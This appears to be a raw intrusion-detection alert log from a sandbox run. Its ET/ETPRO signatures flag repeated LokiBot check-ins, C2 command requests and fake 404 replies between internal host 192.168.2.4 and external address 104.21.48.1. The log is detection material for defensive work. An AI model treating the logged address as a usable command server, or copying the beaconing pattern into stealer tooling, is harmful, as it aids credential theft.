2025-02-24T08:40:23.289335+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49738	104.21.48.1	80	TCP
2025-02-24T08:40:23.289335+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49738	104.21.48.1	80	TCP
2025-02-24T08:40:24.055329+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49738	104.21.48.1	80	TCP
2025-02-24T08:40:24.055329+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49738	104.21.48.1	80	TCP
2025-02-24T08:40:24.060335+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49738	TCP
2025-02-24T08:40:24.218133+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49739	104.21.48.1	80	TCP
2025-02-24T08:40:24.218133+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49739	104.21.48.1	80	TCP
2025-02-24T08:40:24.218133+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49739	104.21.48.1	80	TCP
2025-02-24T08:40:25.002119+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49739	104.21.48.1	80	TCP
2025-02-24T08:40:25.002119+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49739	104.21.48.1	80	TCP
2025-02-24T08:40:25.007429+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49739	TCP
2025-02-24T08:40:25.164608+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49740	104.21.48.1	80	TCP
2025-02-24T08:40:25.164608+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49740	104.21.48.1	80	TCP
2025-02-24T08:40:25.164608+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49740	104.21.48.1	80	TCP
2025-02-24T08:40:25.918929+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49740	104.21.48.1	80	TCP
2025-02-24T08:40:25.918929+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49740	104.21.48.1	80	TCP
2025-02-24T08:40:25.924180+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49740	TCP
2025-02-24T08:40:26.089207+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49741	104.21.48.1	80	TCP
2025-02-24T08:40:26.089207+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49741	104.21.48.1	80	TCP
2025-02-24T08:40:26.089207+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49741	104.21.48.1	80	TCP
2025-02-24T08:40:26.880323+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49741	104.21.48.1	80	TCP
2025-02-24T08:40:26.880323+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49741	104.21.48.1	80	TCP
2025-02-24T08:40:26.886828+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49741	TCP
2025-02-24T08:40:27.042767+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49742	104.21.48.1	80	TCP
2025-02-24T08:40:27.042767+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49742	104.21.48.1	80	TCP
2025-02-24T08:40:27.042767+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49742	104.21.48.1	80	TCP
2025-02-24T08:40:27.805450+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49742	104.21.48.1	80	TCP
2025-02-24T08:40:27.805450+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49742	104.21.48.1	80	TCP
2025-02-24T08:40:27.977477+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49743	104.21.48.1	80	TCP
2025-02-24T08:40:27.977477+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49743	104.21.48.1	80	TCP
2025-02-24T08:40:27.977477+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49743	104.21.48.1	80	TCP
2025-02-24T08:40:28.694033+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49743	104.21.48.1	80	TCP
2025-02-24T08:40:28.694033+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49743	104.21.48.1	80	TCP
2025-02-24T08:40:28.861062+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49744	104.21.48.1	80	TCP
2025-02-24T08:40:28.861062+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49744	104.21.48.1	80	TCP
2025-02-24T08:40:28.861062+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49744	104.21.48.1	80	TCP
2025-02-24T08:40:29.628482+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49744	104.21.48.1	80	TCP
2025-02-24T08:40:29.628482+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49744	104.21.48.1	80	TCP
2025-02-24T08:40:29.633516+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49744	TCP
2025-02-24T08:40:29.817332+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49746	104.21.48.1	80	TCP
2025-02-24T08:40:29.817332+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49746	104.21.48.1	80	TCP
2025-02-24T08:40:29.817332+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49746	104.21.48.1	80	TCP
2025-02-24T08:40:30.607398+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49746	104.21.48.1	80	TCP
2025-02-24T08:40:30.607398+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49746	104.21.48.1	80	TCP
2025-02-24T08:40:30.612533+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49746	TCP
2025-02-24T08:40:30.783053+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49750	104.21.48.1	80	TCP
2025-02-24T08:40:30.783053+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49750	104.21.48.1	80	TCP
2025-02-24T08:40:30.783053+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49750	104.21.48.1	80	TCP
2025-02-24T08:40:31.518250+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49750	104.21.48.1	80	TCP
2025-02-24T08:40:31.518250+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49750	104.21.48.1	80	TCP
2025-02-24T08:40:31.680292+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49752	104.21.48.1	80	TCP
2025-02-24T08:40:31.680292+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49752	104.21.48.1	80	TCP
2025-02-24T08:40:31.680292+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49752	104.21.48.1	80	TCP
2025-02-24T08:40:32.430174+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49752	104.21.48.1	80	TCP
2025-02-24T08:40:32.430174+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49752	104.21.48.1	80	TCP
2025-02-24T08:40:32.457461+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49752	TCP
2025-02-24T08:40:32.626524+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49754	104.21.48.1	80	TCP
2025-02-24T08:40:32.626524+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49754	104.21.48.1	80	TCP
2025-02-24T08:40:32.626524+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49754	104.21.48.1	80	TCP
2025-02-24T08:40:33.347667+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49754	104.21.48.1	80	TCP
2025-02-24T08:40:33.347667+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49754	104.21.48.1	80	TCP
2025-02-24T08:40:33.507918+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49755	104.21.48.1	80	TCP
2025-02-24T08:40:33.507918+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49755	104.21.48.1	80	TCP
2025-02-24T08:40:33.507918+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49755	104.21.48.1	80	TCP
2025-02-24T08:40:34.228413+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49755	104.21.48.1	80	TCP
2025-02-24T08:40:34.228413+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49755	104.21.48.1	80	TCP
2025-02-24T08:40:34.380612+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49756	104.21.48.1	80	TCP
2025-02-24T08:40:34.380612+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49756	104.21.48.1	80	TCP
2025-02-24T08:40:34.380612+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49756	104.21.48.1	80	TCP
2025-02-24T08:40:35.152572+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49756	104.21.48.1	80	TCP
2025-02-24T08:40:35.152572+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49756	104.21.48.1	80	TCP
2025-02-24T08:40:35.157658+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49756	TCP
2025-02-24T08:40:35.304291+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49757	104.21.48.1	80	TCP
2025-02-24T08:40:35.304291+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49757	104.21.48.1	80	TCP
2025-02-24T08:40:35.304291+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49757	104.21.48.1	80	TCP
2025-02-24T08:40:35.962938+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49757	104.21.48.1	80	TCP
2025-02-24T08:40:35.962938+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49757	104.21.48.1	80	TCP
2025-02-24T08:40:35.968020+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49757	TCP
2025-02-24T08:40:36.116918+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49758	104.21.48.1	80	TCP
2025-02-24T08:40:36.116918+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49758	104.21.48.1	80	TCP
2025-02-24T08:40:36.116918+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49758	104.21.48.1	80	TCP
2025-02-24T08:40:36.837053+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49758	104.21.48.1	80	TCP
2025-02-24T08:40:36.837053+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49758	104.21.48.1	80	TCP
2025-02-24T08:40:36.997752+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49759	104.21.48.1	80	TCP
2025-02-24T08:40:36.997752+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49759	104.21.48.1	80	TCP
2025-02-24T08:40:36.997752+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49759	104.21.48.1	80	TCP
2025-02-24T08:40:37.739015+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49759	104.21.48.1	80	TCP
2025-02-24T08:40:37.739015+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49759	104.21.48.1	80	TCP
2025-02-24T08:40:37.744097+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49759	TCP
2025-02-24T08:40:37.911290+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49760	104.21.48.1	80	TCP
2025-02-24T08:40:37.911290+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49760	104.21.48.1	80	TCP
2025-02-24T08:40:37.911290+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49760	104.21.48.1	80	TCP
2025-02-24T08:40:38.704503+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49760	104.21.48.1	80	TCP
2025-02-24T08:40:38.704503+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49760	104.21.48.1	80	TCP
2025-02-24T08:40:38.709627+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49760	TCP
2025-02-24T08:40:39.155461+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49761	104.21.48.1	80	TCP
2025-02-24T08:40:39.155461+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49761	104.21.48.1	80	TCP
2025-02-24T08:40:39.155461+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49761	104.21.48.1	80	TCP
2025-02-24T08:40:39.868013+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49761	104.21.48.1	80	TCP
2025-02-24T08:40:39.868013+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49761	104.21.48.1	80	TCP
2025-02-24T08:40:40.047671+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49762	104.21.48.1	80	TCP
2025-02-24T08:40:40.047671+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49762	104.21.48.1	80	TCP
2025-02-24T08:40:40.047671+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49762	104.21.48.1	80	TCP
2025-02-24T08:40:41.836574+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49762	104.21.48.1	80	TCP
2025-02-24T08:40:41.836574+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49762	104.21.48.1	80	TCP
2025-02-24T08:40:41.994933+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49763	104.21.48.1	80	TCP
2025-02-24T08:40:41.994933+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49763	104.21.48.1	80	TCP
2025-02-24T08:40:41.994933+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49763	104.21.48.1	80	TCP
2025-02-24T08:40:42.803843+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49763	104.21.48.1	80	TCP
2025-02-24T08:40:42.803843+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49763	104.21.48.1	80	TCP
2025-02-24T08:40:42.808907+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49763	TCP
2025-02-24T08:40:42.978187+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49764	104.21.48.1	80	TCP
2025-02-24T08:40:42.978187+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49764	104.21.48.1	80	TCP
2025-02-24T08:40:42.978187+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49764	104.21.48.1	80	TCP
2025-02-24T08:40:43.783480+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49764	104.21.48.1	80	TCP
2025-02-24T08:40:43.783480+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49764	104.21.48.1	80	TCP
2025-02-24T08:40:43.789129+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49764	TCP
2025-02-24T08:40:43.948897+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49765	104.21.48.1	80	TCP
2025-02-24T08:40:43.948897+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49765	104.21.48.1	80	TCP
2025-02-24T08:40:43.948897+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49765	104.21.48.1	80	TCP
2025-02-24T08:40:44.708677+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49765	104.21.48.1	80	TCP
2025-02-24T08:40:44.708677+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49765	104.21.48.1	80	TCP
2025-02-24T08:40:44.713764+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49765	TCP
2025-02-24T08:40:44.899170+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49766	104.21.48.1	80	TCP
2025-02-24T08:40:44.899170+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49766	104.21.48.1	80	TCP
2025-02-24T08:40:44.899170+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49766	104.21.48.1	80	TCP
2025-02-24T08:40:45.615534+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49766	104.21.48.1	80	TCP
2025-02-24T08:40:45.615534+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49766	104.21.48.1	80	TCP
2025-02-24T08:40:45.778880+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49767	104.21.48.1	80	TCP
2025-02-24T08:40:45.778880+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49767	104.21.48.1	80	TCP
2025-02-24T08:40:45.778880+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49767	104.21.48.1	80	TCP
2025-02-24T08:40:46.552124+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49767	104.21.48.1	80	TCP
2025-02-24T08:40:46.552124+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49767	104.21.48.1	80	TCP
2025-02-24T08:40:46.558039+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49767	TCP
2025-02-24T08:40:46.710799+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49768	104.21.48.1	80	TCP
2025-02-24T08:40:46.710799+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49768	104.21.48.1	80	TCP
2025-02-24T08:40:46.710799+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49768	104.21.48.1	80	TCP
2025-02-24T08:40:47.489934+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49768	104.21.48.1	80	TCP
2025-02-24T08:40:47.489934+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49768	104.21.48.1	80	TCP
2025-02-24T08:40:47.495291+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49768	TCP
2025-02-24T08:40:47.657941+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49769	104.21.48.1	80	TCP
2025-02-24T08:40:47.657941+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49769	104.21.48.1	80	TCP
2025-02-24T08:40:47.657941+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49769	104.21.48.1	80	TCP
2025-02-24T08:40:48.380589+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49769	104.21.48.1	80	TCP
2025-02-24T08:40:48.380589+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49769	104.21.48.1	80	TCP
2025-02-24T08:40:48.538949+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49770	104.21.48.1	80	TCP
2025-02-24T08:40:48.538949+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49770	104.21.48.1	80	TCP
2025-02-24T08:40:48.538949+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49770	104.21.48.1	80	TCP
2025-02-24T08:40:49.167883+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49770	104.21.48.1	80	TCP
2025-02-24T08:40:49.167883+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49770	104.21.48.1	80	TCP
2025-02-24T08:40:49.173085+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49770	TCP
2025-02-24T08:40:49.331683+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49771	104.21.48.1	80	TCP
2025-02-24T08:40:49.331683+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49771	104.21.48.1	80	TCP
2025-02-24T08:40:49.331683+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49771	104.21.48.1	80	TCP
2025-02-24T08:40:50.053008+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49771	104.21.48.1	80	TCP
2025-02-24T08:40:50.053008+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49771	104.21.48.1	80	TCP
2025-02-24T08:40:50.240893+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49772	104.21.48.1	80	TCP
2025-02-24T08:40:50.240893+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49772	104.21.48.1	80	TCP
2025-02-24T08:40:50.240893+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49772	104.21.48.1	80	TCP
2025-02-24T08:40:50.996344+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49772	104.21.48.1	80	TCP
2025-02-24T08:40:50.996344+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49772	104.21.48.1	80	TCP
2025-02-24T08:40:51.001958+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49772	TCP
2025-02-24T08:40:51.171451+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49773	104.21.48.1	80	TCP
2025-02-24T08:40:51.171451+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49773	104.21.48.1	80	TCP
2025-02-24T08:40:51.171451+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49773	104.21.48.1	80	TCP
2025-02-24T08:40:52.068550+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49773	104.21.48.1	80	TCP
2025-02-24T08:40:52.068550+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49773	104.21.48.1	80	TCP
2025-02-24T08:40:52.226264+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49774	104.21.48.1	80	TCP
2025-02-24T08:40:52.226264+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49774	104.21.48.1	80	TCP
2025-02-24T08:40:52.226264+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49774	104.21.48.1	80	TCP
2025-02-24T08:40:53.012909+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49774	104.21.48.1	80	TCP
2025-02-24T08:40:53.012909+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49774	104.21.48.1	80	TCP
2025-02-24T08:40:53.018974+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49774	TCP
2025-02-24T08:40:53.501662+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49775	104.21.48.1	80	TCP
2025-02-24T08:40:53.501662+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49775	104.21.48.1	80	TCP
2025-02-24T08:40:53.501662+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49775	104.21.48.1	80	TCP
2025-02-24T08:40:54.257394+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49775	104.21.48.1	80	TCP
2025-02-24T08:40:54.257394+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49775	104.21.48.1	80	TCP
2025-02-24T08:40:54.265551+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49775	TCP
2025-02-24T08:40:54.486059+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49776	104.21.48.1	80	TCP
2025-02-24T08:40:54.486059+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49776	104.21.48.1	80	TCP
2025-02-24T08:40:54.486059+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49776	104.21.48.1	80	TCP
2025-02-24T08:40:55.234327+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49776	104.21.48.1	80	TCP
2025-02-24T08:40:55.234327+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49776	104.21.48.1	80	TCP
2025-02-24T08:40:55.408746+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49777	104.21.48.1	80	TCP
2025-02-24T08:40:55.408746+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49777	104.21.48.1	80	TCP
2025-02-24T08:40:55.408746+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49777	104.21.48.1	80	TCP
2025-02-24T08:40:56.182541+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49777	104.21.48.1	80	TCP
2025-02-24T08:40:56.182541+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49777	104.21.48.1	80	TCP
2025-02-24T08:40:56.187810+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49777	TCP
2025-02-24T08:40:56.514458+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49778	104.21.48.1	80	TCP
2025-02-24T08:40:56.514458+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49778	104.21.48.1	80	TCP
2025-02-24T08:40:56.514458+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49778	104.21.48.1	80	TCP
2025-02-24T08:40:57.247751+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49778	104.21.48.1	80	TCP
2025-02-24T08:40:57.247751+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49778	104.21.48.1	80	TCP
2025-02-24T08:40:57.431407+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49779	104.21.48.1	80	TCP
2025-02-24T08:40:57.431407+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49779	104.21.48.1	80	TCP
2025-02-24T08:40:57.431407+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49779	104.21.48.1	80	TCP
2025-02-24T08:40:59.174518+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49779	104.21.48.1	80	TCP
2025-02-24T08:40:59.174518+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49779	104.21.48.1	80	TCP
2025-02-24T08:40:59.521477+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49780	104.21.48.1	80	TCP
2025-02-24T08:40:59.521477+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49780	104.21.48.1	80	TCP
2025-02-24T08:40:59.521477+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49780	104.21.48.1	80	TCP
